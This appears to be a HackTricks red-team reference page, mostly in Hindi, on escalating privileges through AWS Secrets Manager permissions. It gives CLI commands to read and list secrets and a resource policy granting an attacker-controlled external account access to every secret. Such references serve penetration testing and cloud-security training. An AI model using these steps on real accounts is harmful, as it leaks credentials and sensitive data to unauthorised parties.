AWS - Secrets Manager Privesc

Reading time: 3 minutes

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें

Secrets Manager

Secrets manager के बारे में अधिक जानकारी के लिए देखें:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

इस अनुमति के साथ एक हमलावर AWS Secretsmanager में एक रहस्य के अंदर सहेजा गया मान प्राप्त कर सकता है।

bash
aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

संभावित प्रभाव: AWS सीक्रेट्स मैनेजर सेवा के अंदर उच्च संवेदनशील डेटा तक पहुंच प्राप्त करना।

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

पिछले अनुमतियों के साथ, यह संभव है कि अन्य प्रिंसिपल/खातों (यहां तक कि बाहरी) को गुप्त तक पहुंच देने के लिए। ध्यान दें कि KMS कुंजी के साथ एन्क्रिप्ट किए गए गुप्तों को पढ़ने के लिए, उपयोगकर्ता को KMS कुंजी पर पहुंच भी होनी चाहिए (अधिक जानकारी के लिए KMS Enum पृष्ठ देखें)।

bash
aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE) Azure हैकिंग सीखें और अभ्यास करें: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks का समर्थन करें